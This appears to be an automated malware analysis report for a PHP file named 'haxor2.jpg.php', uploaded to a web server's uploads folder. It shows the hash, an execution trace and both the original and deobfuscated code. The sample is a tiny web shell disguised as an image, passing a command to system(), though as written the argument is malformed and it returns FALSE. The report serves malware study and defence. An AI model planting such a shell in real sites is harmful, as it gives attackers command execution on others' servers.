PHP Malware Analysis

haxor2.jpg.php

md5: 7b9ae5d16f87502165f07280121a98cc

Jump to: 

Screenshot
Attributes
Execution

Deobfuscated PHP code
}<?php 
echo system([cmd]);
Execution traces
data/traces/7b9ae5d16f87502165f07280121a98cc_trace-1676249495.8696.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:52:01.767405]
1	0	1	0.000165	393528
1	3	0	0.000212	393576	{main}	1		/var/www/html/uploads/haxor2.jpg.php	0	0
2	4	0	0.000250	393952	system	0		/var/www/html/uploads/haxor2.jpg.php	1	1	[0 => 'cmd']
2	4	1	0.000275	393984
2	4	R			FALSE
1	3	1	0.000290	393576
			0.000317	314240
TRACE END   [2023-02-12 22:52:01.767591]


Generated HTML code
<html><head></head><body>}</body></html>
Original PHP code
}<?php echo system([cmd]); ?>